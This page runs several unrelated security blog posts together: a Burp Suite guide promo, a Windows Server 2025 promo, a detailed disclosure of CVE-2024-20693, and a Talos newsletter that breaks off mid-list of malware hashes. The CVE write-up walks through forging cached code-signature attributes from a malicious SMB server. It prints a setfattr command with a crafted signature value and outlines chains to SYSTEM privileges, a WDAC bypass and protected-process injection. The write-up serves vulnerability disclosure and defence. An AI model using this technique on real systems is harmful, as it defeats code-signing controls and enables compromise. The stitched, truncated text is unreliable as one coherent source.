While Burp is a comprehensive tool for web application security testing, its extensive features may present a complex barrier. That’s where we, Trail of Bits, stand ready with our new Burp Suite guide in the Testing Handbook. This chapter aims to cut through this complexity, providing a clear and concise roadmap for running Burp Suite and achieving quick and tangible results.

The new chapter starts with an essential discussion on where Burp can support you. This section provides in-depth insights into how Burp can enhance your ability to conduct security testing, especially in the face of challenges like obfuscated front-end code, intricate infrastructural components, variations in deployment environments, or client-side data handling issues.

The chapter provides a step-by-step guide to setting up Burp for your specific application quickly and effectively. It guides you through minimizing setup errors and ensuring potential vulnerabilities are not overlooked—a game-changer in terms of your security auditing outcomes. We also explore using key Burp extensions to supercharge your application testing processes and discover more vulnerabilities.

Our Burp chapter concludes with numerous professional tips and tricks to empower you to perform advanced practices and to reveal hidden Burp characteristics that could revolutionize your security testing routine.

Real-world knowledge, real-world results

The Testing Handbook series encapsulates our extensive real-world knowledge and experience. Our insights go beyond mere documentation recitations, offering tried-and-tested strategies from the Trail of Bits team’s security auditing experience.

With this new chapter, we hope to impart the knowledge and confidence you need to dive into Burp Suite and truly harness its potential to secure your web applications.

Ready to supercharge your security testing with Burp Suite? Dive into the chapter now.

Windows Server 2025 and beyond

 

Windows Server 2025 is the most secure and performant release yet! Download the evaluation now!

Looking to migrate from VMware to Windows Server 2025? Contact your Microsoft account team!

The 2024 Windows Server Summit was held in March and brought three days of demos, technical sessions, and Q&A, led by Microsoft engineers, guest experts from Intel®, and our MVP community. For more videos from this year’s Windows Server Summit, please find the full session list here.

 

This article focuses on what’s new and what’s coming in Windows Server 2025.

 

What's new in Windows Server 2025

Get a closer look at Windows Server 2025. Explore improvements, enhancements, and new capabilities. We'll walk you through the big picture and offer a guide to which Windows Server Summit sessions will help you learn more.

 

What’s ahead for Windows Server

What’s in it for you? Get a summary of the most important features coming in Windows Server 2025 that will make your life easier and your work more impactful. In this fireside chat, Hari Pulapaka, Windows Server GM and Jeff Woolsey, Principal PM manager, provide an overview of what’s next, and provide their thoughts on how Windows Server can help you stay ahead.

 

CVE-2024-20693: Windows cached code signature manipulation

14 June 2024 at 00:00

In the Patch Tuesday update of April 2024, Microsoft released a fix for CVE-2024-20693, a vulnerability we reported. This vulnerability allowed manipulating the cached signature signing level of an executable or DLL. In this post, we’ll describe how we found this issue and what the impact could be on Windows 11.

Background

Last year, we started a project to improve our knowledge of Windows internals, specifically about local vulnerabilities such as privilege escalation. The best way to get started on a new target is to look at recent publications from other researchers. This gives the most up to date overview of the security design, allows looking for variants of the vulnerability or even bypasses for the implemented fixes.

The most helpful prior work we found was the presentation “The Print Spooler Bug that Wasn’t in the Print Spooler” at OffensiveCon 2023 by Maddie Stone and James Forshaw from Google. This talk describes a Windows privilege escalation exploit discovered in the wild.

Privilege escalation using an impersonated device map and isolation-aware DLLs

In case you haven’t watched this presentation, we’ll summarize it here: a highly privileged Windows service that handles requests on behalf of lower-privileged processes can impersonate the requesting process, in order to make all operations performed by the highly privileged service be performed with the permissions and privileges of the lower-privileged process. This is a great security measure, as it means the highly privileged service can never accidentally do something the lower-privileged process would not be able to do itself.

One thing to note is that a (lowly privileged) process on Windows can change its device map, which can be used to redirect a device letter such as C: to a different location (for example a specific subfolder, like C:\fakeroot). This changed device map is one of the aspects included in impersonation. This is quite risky: what if the impersonating service attempts to load a DLL while impersonating another process which has set a different device map? That issue was already reported in 2015 by James Forshaw and fixed.

However, the logic for determining which file to load for LoadLibrary can be quite complicated if it involves side-by-side assemblies (WinSxS). On Windows, it’s possible to install multiple different versions of a DLL and manifest files can be used to specify which version to load for a specific application. DLL files can also include an embedded manifest to specify which version of its versioned dependencies to load. These are called “isolation aware” DLLs.

The core of the exploited vulnerability is the fact that when an isolation aware DLL file is loaded, the impersonated device map would be used to find the manifests of its dependencies. By combining this with a path traversal in the manifest file, it was possible to make a privileged service load a DLL from a folder on disk specified by the lower privileged process. Loading this malicious DLL would then lead to privilege escalation (impersonation by design no longer provides any security when malicious code is loaded, because it can revert the impersonation). For this attack to work, the impersonating service must load an isolation aware DLL, which depends on at least one other DLL.

The fix applied by Microsoft to address the issue covered in the Maddie Stone and James Forshaw presentation was to apply a new mitigation to disable the loading of WinSxS manifests using the impersonated device map, but only for processes that have specifically opted-in. This flag was only set for a few services that were known to be vulnerable. This means that a lot of privileged services were left that could be examined for the same issue. Very helpfully, Maddie and James explained how to configure Process Monitor on Windows how to find these issues:

Screenshot from the presentation showing how to set up a Process Monitor filter.

So, we set to work finding issues like this. We made a list of isolation aware DLLs with at least one dependency on another library, set up the Process Monitor filters as described and wrote a simple PowerShell script (using the NtObjectManager PowerShell module also from James Forshaw) to enumerate all RPC services and attempt to call all methods. Then, we cross-referenced the libraries loaded under impersonation with the list of DLLs using a manifest.

We found a single match: wscsvc.dll!

wscsvc.dll

When calling the RPC endpoint with number 12 on this service (which takes no arguments), it indirectly loads gpedit.dll. This is an isolation aware DLL, which depends on (among others) comctl32.dll. We replicated the setup from the in-the-wild exploit, creating a new directory at C:\fakeroot, added the required manifest and DLL files, redirecting C: to C:\fakeroot and then sending this COM message.

And it works… almost. Process Monitor shows that it opens and reads our fake DLL file, but never gets to “Load Image”, which is the step where the actual code execution starts. Somehow, it was resolving our DLL but refusing to execute its code.

Then we found out that the process associated with the wscsvc.dll service, namely the “Windows Security Center Service”, is categorized as a PPL (Protected Process Light). This means that it places restrictions on the code signature of DLL files it loads.

Protected Process (Light)

Windows recognizes a number of different protection levels to protect processes from being “modified” (such as terminating it, modifying memory, adding new threads) by a process at a lower protection level. This is used, for example, to make it harder to disable AV tools or important Windows services.

As of Windows 11, the protection levels are:

Level Value
App 8
WinSystem 7
WinTcb 6
Windows 5
Lsa 4
Antimalware 3
CodeGen 2
Authenticode 1
None 0

Whether an operation is allowed is determined by a table known as RtlProtectedAccess. We have summarized it as follows:

→Target ↓Requesting Authenti- code CodeGen Anti- malware Lsa Windows WinTcb WinSystem App
Authenticode
CodeGen
Antimalware
Lsa
Windows
WinTcb
WinSystem

It can roughly be summarized as follows: Windows, WinTcb and WinSystem form a hierarchy (Windows < WinTcb < WinSystem). Authenticode, CodeGen, Antimalware and Lsa are separate groups that only allow access from processes in the same group or the Win-* hierarchy. We are not sure how “App” is used, it is new in Windows 10 and has not been documented very well.

In addition, there is the difference between a Protected Process (PP) and a Protected Process Light (PPL): a Protected Process can modify a Protected Process Light (based on the table above), but not the other way around. The some examples are Antimalware PPLs for third-party security tools and WinTCB or Windows at PP for critical Windows services (like managing DRM). Keep in mind that these protection levels are also in addition to all other authorization checks (such as integrity levels) in Windows. For more information about protected processes, see https://itm4n.github.io/lsass-runasppl/.

Note that this is not considered a defended security boundary by Microsoft: a process running as Administrator can load an exploitable kernel driver, which can be used to modify all protected processes. As admin to kernel is not a security boundary according to Microsoft, protected processes can also not be a security boundary for Administrators.

Aside from the restrictions on being manipulated by other processes, protected processes are also limited in what DLLs they may load. For example, anti-malware services may only load DLLs signed with the same codesigning certificate or by Microsoft itself. From Protecting anti-malware services:

DLL signing requirements

[A]ny non-Windows DLLs that get loaded into the protected service must be signed with the same certificate that was used to sign the anti-malware service.

For protected processes in general, they are only allowed to load a DLL signed with a specific Signature Level. Signature levels are assigned to a DLL based on the certificate and its issuer used for the code signature. The exact rules for when which PPL level may load a DLL with a specific signature level are quite complicated (and these rules can even be customized with a secure boot policy) and we’ll not go into those here. But to summarize: only certain Windows-signed DLLs were allowed to be loaded into our target service.

At this point we had two options: find a different service with the same WinSxS under impersonation vulnerability, or try to bypass the signing of Windows DLL files. The most likely to yield results would of course have been to look for a different service, but the goal of the project was to understand Windows internals better, so we decided to spend a little bit of time on understanding how DLL files are signed.

Sector 7 deciding what to research.

DLL signatures

The codesigning process for PE files is known as Authenticode. Just like TLS, it is based on X.509 certificates. An Authenticode signature is generated by computing the hash of the PE file (leaving out certain fields that will change after signing, such as the checksum and the section for the signature itself), then signing that hash and appending it to the file with the certificate chain (and optionally a timestamp).

Because signature verification can be slow and loading DLLs happens often on Windows, a caching method has been implemented for code signatures. For a signed DLL or EXE file, the result of the certificate verification can be stored in an NTFS Extended Attribute (EA) named $KERNEL.PURGE.ESBCACHE. The $KERNEL part of this name means that only the Windows kernel is allowed to set or change this EA. The PURGE part means that the EA will be automatically removed if the contents of the file are modified. This means that it should not be possible to set this EA from usermode or to modify the file without removing the EA. This only works on journaled NTFS partitions, as the PURGE functionality depends on the journal. Note that nothing in this EA binds it to the file: these attributes contain the journal ID, but nothing like a file path or inode number.

In 2017, James Forshaw had reported that it was possible to race the application of this EA: by making the file refer to a catalog, it was possible to slow down the verification enough to modify the contents of the file in between the verification of the signature and the application of the EA. As this was already found a while ago, it was unlikely that doing this was going to work.

We experimented with placing the file on an SMB share instead and attempting to rewrite the contents in between the verification and image loading, but this wasn’t working either (the file was only being read once). But looking at our Wireshark capture and the decompiled code in CI.DLL that parses the $KERNEL.PURGE.ESBCACHE extended attribute we noticed something standing out:

Screenshot from Wireshark showing an ioctl request with ID 0x90390.

A $KERNEL.PURGE.ESBCACHE extended attribute should only be trusted on the local volume, as a filesystem on (for example) a USB drive or mounted disk image could have been manipulated by the user. There was a check in the code we assumed was meant to check for this and only allow the local boot disk using the function CipGetVolumeFlags.

__int64 __fastcall CipGetVolumeFlags(__int64 file, int *attributeInformation, _BYTE *containerState)
{
  int *v6; // x20
  BOOL shouldFree; // w21
  int ioctlResponse; // w9
  unsigned int err; // w19
  unsigned int v10; // w19
  __int64 buffer; // x0
  int outputBuffer; // [xsp+0h] [xbp-40h] BYREF
  int returnedOutputBufferLength; // [xsp+4h] [xbp-3Ch] BYREF
  int fsInformation[14]; // [xsp+8h] [xbp-38h] BYREF

  outputBuffer = 0;
  returnedOutputBufferLength = 0;
  memset(fsInformation, 0, 48);
  v6 = fsInformation;
  shouldFree = 0;
  // containerState will be set based on the response to the ioctl with ID 0x90390LL on the file
  if ( (int)FsRtlKernelFsControlFile(file, 0x90390LL, 0LL, 0LL, &outputBuffer, 4LL, &returnedOutputBufferLength) >= 0 )
    ioctlResponse = outputBuffer;
  else
    ioctlResponse = 0;
  outputBuffer = ioctlResponse;
  *containerState = ioctlResponse & 1;
  // attributeInformation will be set based on the IoQueryVolumeInformation for FileFsAttributeInformation (5)
  err = IoQueryVolumeInformation(file, 5LL, 48LL, fsInformation, &returnedOutputBufferLength);
  if ( err == 0x80000005 )
  {
    // Retry in case the buffer is too small
    v10 = fsInformation[2] + 8;
    buffer = ExAllocatePool2(258LL, (unsigned int)(fsInformation[2] + 8), 'csIC');
    v6 = (int *)buffer;
    if ( !buffer )
      return 0xC000009A;
    shouldFree = 1;
    err = IoQueryVolumeInformation(file, 5LL, v10, buffer, &returnedOutputBufferLength);
  }
  if ( (err & 0x80000000) == 0 )
    *attributeInformation = *v6;
  if ( shouldFree )
    ExFreePoolWithTag(v6, 'csIC');
  return err;
}

This was being called from CipGetFileCache:

__int64 __fastcall CipGetFileCache(
        __int64 fileObject,
        unsigned __int8 a2,
        int a3,
        unsigned int *a4,
        _DWORD *a5,
        unsigned __int8 *a6,
        int *a7,
        __int64 a8,
        _DWORD *a9,
        _DWORD *a10,
        __int64 a11,
        __int64 a12,
        _QWORD *a13,
        __int64 *a14)
{
  __int64 eaBuffer_1; // x20
  unsigned __int64 v17; // x22
  unsigned int fileAttributes; // w25
  unsigned int attributeInformation_FileSystemAttributes; // w19
  unsigned int err; // w19
  unsigned int err_1; // w0
  __int64 v22; // x4
  __int64 v23; // x3
  __int64 v24; // x2
  __int64 v25; // x1
  int containerState_1; // w10
  unsigned int v28; // w8
  __int64 eaBuffer; // x0
  _DWORD *v30; // x23
  unsigned __int8 *v31; // x24
  int v32; // w8
  char v33; // w22
  const char *v34; // x10
  __int16 v35; // w9
  char v36; // w8
  unsigned int v37; // w25
  int v38; // w9
  int IsEnabled; // w0
  unsigned int v40; // w8
  unsigned int ContextForReplay; // w0
  __int64 v42; // x2
  _QWORD *v43; // x11
  int v44; // w10
  __int64 v45; // x9
  unsigned __int8 containerState; // [xsp+10h] [xbp-C0h] BYREF
  char v47[7]; // [xsp+11h] [xbp-BFh] BYREF
  _DWORD *v48; // [xsp+18h] [xbp-B8h]
  unsigned __int8 *v49; // [xsp+20h] [xbp-B0h]
  unsigned __int8 v50; // [xsp+28h] [xbp-A8h]
  unsigned __int64 v51; // [xsp+30h] [xbp-A0h] BYREF
  unsigned int v52; // [xsp+38h] [xbp-98h]
  int attributeInformation; // [xsp+3Ch] [xbp-94h] BYREF
  int v54; // [xsp+40h] [xbp-90h] BYREF
  int lengthReturned_1; // [xsp+44h] [xbp-8Ch] BYREF
  int lengthReturned; // [xsp+48h] [xbp-88h] BYREF
  int v57; // [xsp+4Ch] [xbp-84h]
  __int64 v58; // [xsp+50h] [xbp-80h]
  __int64 v59; // [xsp+58h] [xbp-78h]
  __int64 v60; // [xsp+60h] [xbp-70h]
  _QWORD *v61; // [xsp+68h] [xbp-68h]
  int *v62; // [xsp+70h] [xbp-60h]
  int eaList[8]; // [xsp+78h] [xbp-58h] BYREF
  char fileBasicInformation[40]; // [xsp+98h] [xbp-38h] BYREF

  [...]

  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 )
  {
    containerState_1 = 0;
  }
  else
  {
    lengthReturned_1 = 0;
    memset(fileBasicInformation, 0, sizeof(fileBasicInformation));
    err = IoQueryFileInformation(fileObject, 4LL, 40LL, fileBasicInformation, &lengthReturned_1);
    if ( (err & 0x80000000) != 0 )
    {
      [...]
      goto LABEL_8;
    }
    fileAttributes = *(_DWORD *)&fileBasicInformation[32];
    // Calling the function above
    err_1 = CipGetVolumeFlags(fileObject, &attributeInformation, &containerState);
    v17 = v51;
    err = err_1;
    if ( (err_1 & 0x80000000) != 0 )
    {
      *a4 = 27;
LABEL_7:
      v22 = *a4;
      goto LABEL_8;
    }
    attributeInformation_FileSystemAttributes = attributeInformation;
    containerState_1 = containerState;
  }
  // If the out variable containerState was non-zero, all of the checks don't matter and we go to LABEL_19 to read the EA.
  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 || containerState_1 )
    goto LABEL_19;
  if ( (g_CiOptions & 0x100) == 0 )
  {
    if ( (attributeInformation_FileSystemAttributes & 0x20000) == 0 || (fileAttributes & 0x4000) == 0 )
    {
      *a4 = 5;
      v17 = fileAttributes | ((unsigned __int64)attributeInformation_FileSystemAttributes << 32);
      err = 0xC00000BB;
      goto LABEL_7;
    }
    goto LABEL_23;
  }
  if ( (attributeInformation_FileSystemAttributes & 0x20000) != 0 && (fileAttributes & 0x4000) != 0 )
  {
	
	[...]

  }
LABEL_19:
  eaBuffer = ExAllocateFromPagedLookasideList(&g_CiEaCacheLookasideList);
  eaBuffer_1 = eaBuffer;
  if ( !eaBuffer )
  {
    v28 = 28;
    err = 0xC0000017;
    goto LABEL_12;
  }
  v33 = v50;
  eaList[0] = 0;
  LOBYTE(eaList[1]) = 22;
  if ( v50 )
  {
    v34 = "$Kernel.Purge.CIpCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.CIpCache";
  }
  else
  {
    v34 = "$Kernel.Purge.ESBCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.ESBCache";
  }
  v35 = *((_WORD *)v34 + 10);
  *(int *)((char *)&eaList[5] + 1) = *((_DWORD *)v34 + 4);
  v36 = v34[22];
  *(_WORD *)((char *)&eaList[6] + 1) = v35;
  HIBYTE(eaList[6]) = v36;
  err = FsRtlQueryKernelEaFile(fileObject, eaBuffer, 380LL, 0LL, eaList, 32LL, 0LL, 1LL, &lengthReturned);
  if ( (err & 0x80000000) != 0 )
  {
    *a4 = 2;
LABEL_34:
    v30 = v48;
    v31 = v49;
LABEL_35:
    ExFreeToPagedLookasideList(&g_CiEaCacheLookasideList, eaBuffer_1);
    v17 = v51;
    goto LABEL_36;
  }
  err = CipParseFileCache(eaBuffer_1, v33, (int *)a4, &v51, eaBuffer_1 + 488);
  if ( (err & 0x80000000) != 0 )
    goto LABEL_34;
  v37 = v57;
  err = CipVerifyFileCache((__int64 *)(eaBuffer_1 + 488), eaBuffer_1, fileObject, v57, v58, &v54, (int *)a4, &v51);
  
  [...]

  return err;
}

What we assumed to be an ioctl that would be handled by the SMB driver (using code 0x90390, which isn’t documented officially, but may refer to FSCTL_QUERY_VOLUME_CONTAINER_STATE, based on Microsoft’s Rust headers) turned out to be an ioctl that gets forwarded over SMB to the server. (While we called it NTFS Extended Attributes, these extended attributes in fact work over SMB too.)

If that icotl results in a value with the lowest bit set, containerState/containerState_1 in CipGetFileCache become non-zero and the code jumps to LABEL_19 above (skipping a lot checks on the file type, device type and a g_CiOptions global we don’t fully understand either).

In other words: the $KERNEL.PURGE.ESBCACHE extended attribute on a file on a SMB share is trusted if the SMB server itself responds to this ioctl that it should be trusted! This is of course a problem, as by default non-admin users can mount new network shares.

We started out with samba and patched it to always respond 0x00000001 to this ioctl (it is not implemented currently) and implemented two more ioctls: 0x900f4 (FSCTL_QUERY_USN_JOURNAL) for reading the journaling information and 0x900ef (FSCTL_WRITE_USN_CLOSE_RECORD) for flushing the journal. We configured Samba to use the ext3 extended attributes to store the EAs used for SMB.

And it worked! From our Linux server running samba, we could apply any $KERNEL.PURGE.ESBCACHE attribute on a file and Windows would trust it. On Linux, the extended attributes used by Samba can be set using setfattr. 1

setfattr -n 'user.$KERNEL.PURGE.ESBCACHE' -v '0skwAAAAMAAg4AAAAAAAAAAIC1e18kqdkBQgAAAHUAJwEMgAAAIGliE1R8dXRmTogdh511MDKXHu0gQC2E1gewfvL5KmZ+JwAMgAAAIGOIg7QdUUiX461yis071EIc4IyH1TDa1WkxRY/PW8thJwQMgAAAIDSDabKZZ2jBOK8AdcS2gu8F0miSEm+H/RilbYQrLrbj' "$1"

We could now create fake EAs that could specify any code signing level we wanted. How can we abuse this?

Combining the DLL load and signature bypass

Now we got to the next challenge: how do we combine these two vulnerabilities? We could make wscsvc.dll load our own DLL using path traversal, but we can’t path traversal from C: into an SMB share. A symbolic link could work, but by default non-admin users on Windows are not allowed to create these. Directory junctions and other symlink-like constructs that Windows supports can not point to SMB shares.

We could perform the attack if the user plugged in a NTFS formatted USB device with a symlink to the SMB share. The user could then create a directory junction from the new C: mountpoint in their devicemap to the USB disk.

C:\fakeroot --(directory junction)--> E:\ --(symlink)--> \\sambaserver\mount

But this required physical access to the machine. We preferred something that would also work remotely.

So we needed a third vulnerability: creating a symlink as a non-admin user.

We tried various things, like mounting disk images or unpacking zip files with symlinks, but before we had found a way to do this, Microsoft had rolled out a more extensive fix for the WinSxS manifest loading under impersonated device maps in August 2023 (as CVE-2023-35359): instead of being opt-in for processes, the device map was now always ignored for reading the manifest.

This meant that our DLL loading vulnerability in wscsvc.dll was no longer working, but we still had the signature bypass. So, next question: what can we do with just cached signature level manipulation on Windows?

Applying the signature bypass

Privilege escalation to SYSTEM using .theme files

In the previous post “Getting SYSTEM on Windows in style” we showed how we managed to elevate privileges on Windows by racing a signing check for a DLL included from a Windows .theme file. In that post, we used a race condition, but we originally found it by setting a manipulated $KERNEL.PURGE.ESBCACHE attribute on the *.msstyles_vrf.dll file. This worked in essentially the same way: we set a new theme which refers to a specifically crafted .msstyles file. Next to the .msstyles file, we place a .msstyles_vrf.dll file. When the user logs in (or sets DPI scaling to >100%), WinLogon.exe (which runs as SYSTEM) will check the signature level of this DLL file, and if it is at least signed at level 6 (“Store”), it will load it, elevating our privileges.

As Microsoft completely removed the loading of *.msstyles_vrf.dll files from themes for CVE-2023-38146, this issue was also fixed.

Bypassing WDAC

One place where cached signatures were used for executables is for Windows Defender Application Control (WDAC), which is an allowlisting technology for executables on Windows. This functionality can be used (typically in a corporate environment) to limit which applications a user is allowed to run and which DLLs may be loaded. Binaries can be allowlisted based on file path, file hash but also the identity of the code signer. WDAC policies can be very powerful and granular, so each company using it probably has their own policy, but the default templates allow all software signed by Microsoft itself to run.

Assuming the WDAC policy allows all software signed by Microsoft, we can add an EA indicating Microsoft as the signer to any executable and run it.

Injecting code into protected processes

The signature bypass can also be used by administrators to inject code into a protected process (regardless of the level). For example, by replacing a DLL from system32 with a symlink to a SMB share and then launching a service that runs as a protected process.

Keep in mind that this is not considered a security boundary by Microsoft, which also means that known techniques that abuse this do not get fixed. So for our demonstration we combined it with the approach used by ANGRYORCHARD to mark our thread as a kernel mode thread and then map the device’s physical memory into our process.

Combining all steps

  1. We use the modified EA on a .msstyles_vrf.dll file to bypass the signature verification in Winlogon.exe to elevate privileges to SYSTEM.
  2. We replace a DLL file from system32 with a symlink to a file with a manipulated cached signature on the SMB share. Then, we launch a protected process running at level WindowsTCB (we chose services.exe).
  3. We use our code running in services.exe to inject code into CSRSS.exe and apply the technique from ANGRYORCHARD to gain physical memory r/w.

Combined with the Mark-of-the-Web bypass found by carrot_c4k3 for .themepack files, this attack could have been triggered with just the user opening a downloaded file. Depending on the WDAC policy, we could also have bypassed that.

Fix

So, how did Microsoft fix this?

We had hoped they would disable the reading of $KERNEL.* extended attributes from SMB completely. However, that was not the approach that was taken. Instead, the instances we exploited were fixed:

  1. The fix for CVE-2023-38146 already disabled the loading for *.msstyles_vrf.dll files completely, fixing the privilege escalation.
  2. When WDAC is enabled, the function to retrieve the cached signature level of a file now always returns an error (even for local files!).
  3. When loading a DLL into a protected process, the cached signature level is no longer used. (This was fixed despite Microsoft not considering it a defended security boundary.)

Timeline

  • August 25, 2023: Issue reported to MSRC.
  • September 12, 2023: The fix for CVE-2023-38146 was released, breaking our privilege escalation exploit.
  • September 20, 2023: MSRC indicates that they have reproduced the issue and that a fix is scheduled for January 2024.
  • December 11, 2023: MSRC informs us that a regression was found and asks to reschedule the fix to April 2024.
  • April 9, 2024: Fix released for the WDAC and PPL bypass as CVE-2024-20693.
  • April 25, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us.
  • April 26, 2024: Microsoft Bounty Team sends back a boilerplate reply that the case is under review.
  • May 17, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us again.
  • May 22, 2024: Microsoft Bounty Team replies that the vulnerability was out of scope for a bounty, claiming it didn’t reproduce on the right WIP build.
  • May 23, 2024: Informed Microsoft Bounty Team that we believe the exploit did reproduce on the latest WIP build and that the WDAC bypass was not a known isue.
  • May 29, 2024: Microsoft Bounty Team had re-evaluted the issue and assigns a bounty.

Mitigation

This attack depends on the victim connecting to a malicious SMB server. Therefore, blocking outgoing SMB to the internet would make this attack a lot harder (unless the attacker already has a foothold on the local network). Preventing users from mounting new SMB shares could also be done as a mitigation, but could have more unintended results.

Examining SMB traffic for exploitation of this issue should also be possible by looking for responses to the ioctl 0x90390 or responses for the EA $KERNEL.PURGE.ESBCACHE.

Conclusion

We set out to increase our understanding of Windows internals by adapting research into DLL loading into impersonating services using WinSxS, but we got sidetracked into examining the code signing method used for DLL files and we found a way to bypass it. While we were unable to apply it in the scenario we started out with, we did find other places where we could use it to elevate privileges, bypass WDAC and inject code into protected processes. Just like our previous research “Bad things come in large packages: .pkg signature verification bypass on macOS” about a signature bypass for macOS .pkg files, we see here that vulnerabilities in cryptographic operations can often be applied in a multitude of ways, allowing different security measures to be bypassed. Just like that example, this vulnerability could go from a user opening a downloaded file to full system compromise.


  1. There appears to be a disagreement between Samba and Windows about what a SMB2_FILE_FULL_EA_INFO GetInfo request means. Windows issues it to query the value for a specific EA, while Samba responds with all EAs on a file, which confuses Windows. Instead of trying to patch Samba to fix this, we have resolved it by making sure the $KERNEL.PURGE.ESBCACHE EA is the only EA set on the file. ↩︎

How we can separate botnets from the malware operations that rely on them

13 June 2024 at 18:00
How we can separate botnets from the malware operations that rely on them

As I covered in last week’s newsletter, law enforcement agencies from around the globe have been touting recent botnet disruptions affecting the likes of some of the largest threat actors and malware families.  

Operation Endgame, which Europol touted as the “largest ever operation against botnets,” targeted malware droppers including the IcedID banking trojan, Trickbot ransomware, the Smokeloader malware loader, and more.  

A separate disruption campaign targeted a botnet called “911 S5,” which the FBI said was used to “commit cyber attacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.” 

But with these types of announcements, I think there can be confusion about what a botnet disruption means, exactly. As we’ve written about before in the case of the LockBit ransomware, botnet and server disruptions can certainly cause headaches for threat actors, but usually are not a complete shutdown of their operations, forcing them to go offline forever.  

I’m not saying that Operation Endgame and the 911 S5 disruption aren’t huge wins for defenders, but I do think it’s important to separate botnets from the malware and threat actors themselves.  

For the uninitiated, a botnet is a network of computers or other internet-connected devices that are infected by malware and controlled by a single threat actor or group. Larger botnets are often used to send spam emails in large volumes or carry out distributed denial-of-service attacks by using a mountain of IP addresses to send traffic to a specific target all in a short period. Smaller botnets might be used in targeted network intrusions, or financially motivated botnet controllers might be looking to steal money from targets. 

When law enforcement agencies remove devices from these botnets, it does disrupt actors’ abilities to carry out these actions, but it’s not necessarily the end of the final payload these actors usually use, such as ransomware.  

When discussing this topic in relation to the Volt Typhoon APT, Kendall McKay from our threat intelligence team told me in the latest episode of Talos Takes that botnets should be viewed as separate entity from a malware family or APT. In the case of Volt Typhoon, the FBI said earlier this year it had disrupted the Chinese APT’s botnet, though McKay said “we’re not sure yet” if this has had any tangible effects on their operations. 

With past major botnet disruptions like Emotet and other Trickbot efforts, she also said that “eventually, those threats re-emerge, and the infected devices re-propagate [because] they have worm-like capabilities.” 

So, the next time you see headlines about a botnet disruption, know that yes, this is good news, but it’s also not time to start thinking the affected malware is gone forever.  

The one big thing 

This week, Cisco Talos disclosed a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.” Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  

Why do I care? 

While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware. There are two ways that this attacker commonly targets users to be on the lookout for: One is spearphishing emails that look like they’re referencing legitimate government-related documents and issues, and the other is social media-based phishing. Always be vigilant about anyone reaching out to you via direct messages on platforms like Twitter and LinkedIn.  

So now what? 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense in depth models to protect against such attacks across various attack surfaces. 

Top security headlines of the week 

Microsoft announced changes to its Recall AI service after privacy advocates and security engineers warned about the potential privacy dangers of such a feature. The Recall tool in Windows 11 takes continuous screenshots of users’ activity which can then be queried by the user to do things like locate files or remember the last thing they were working on. However, all that data collected by Recall is stored locally on the device, potentially opening the door to data theft if a machine were to be compromised. Now, Recall will be opt-in only, meaning it’ll be turned off by default for users when it launches in an update to Windows 11. The feature will also be tied to the Windows Hello authentication protocol, meaning anyone who wants to look at their timeline needs to log in with face or fingerprint ID, or a unique PIN. After Recall’s announcement, security researcher Kevin Beaumont discovered that the AI-powered feature stored data in a database in plain text. That could have made it easy for threat actors to create tools to extract the database and its contents. Now, Microsoft has also made it so that these screenshots and the search index database are encrypted, and are only decrypted if the user authenticates. (The Verge, CNET

A data breach affecting cloud storage provider Snowflake has the potential to be one of the largest security events ever if the alleged number of affected users is accurate. Security researchers helping to address the attack targeting Snowflake said this week that financially motivated cybercriminals have stolen “a significant volume of data” from hundreds of customers. As many as 165 companies that use Snowflake could be affected, which is notable because Snowflake is generally used to store massive volumes of data on its servers. Breaches affecting Ticketmaster, Santander bank and Lending Tree have already been linked to the Snowflake incident. Incident responders working on the breach wrote this week that the attackers used stolen credentials to access customers’ Snowflake instances and steal valuable data. The activity dates back to at least April 14. Reporters at online news outlet TechCrunch also found that hundreds of Snowflake customer credentials were available on the dark web, after malware infected Snowflake staffers’ computers. The list poses an ongoing risk to any Snowflake users who had not changed their passwords as of the first disclosure of this breach or are not protected by multi-factor authentication. (TechCrunch, Wired

Recovery of a cyber attack affecting several large hospitals in London could take several months to resolve, according to an official with the U.K.’s National Health Service. The affected hospitals and general practitioners’ offices serve a combined 2 million patients. A recent cyber attack targeting a private firm called Synnovis that analyzes blood tests has forced these offices to reschedule appointments and cancel crucial surgeries. “It is unclear how long it will take for the services to get back to normal, but it is likely to take many months,” the NHS official told The Guardian newspaper. Britain also had to put out a call for volunteers to donate type O blood as soon as possible, as the attack has made it more difficult for health care facilities to match patients’ blood types at the same frequency as usual. Type O blood is generally known to be safe for all patients and is commonly used in major surgeries. (BBC, The Guardian

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 2d1a07754e76c65d324ab8e538fa74e5d5eb587acb260f9e56afbcf4f4848be5 
MD5: d3ee270a07df8e87246305187d471f68 
Typical Filename: iptray.exe 
Claimed Product: Cisco AMP 
Detection Name: Generic.XMRIGMiner.A.A13F9FCC

SHA 256: 9b2ebc5d554b33cb661f979db5b9f99d4a2f967639d73653f667370800ee105e 
MD5: ecbfdbb42cb98a597ef81abea193ac8f 
Typical Filename: N/A 
Claimed Product: MAPIToolkitConsole.exe 
Detection Name: Gen:Variant.Barys.460270 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
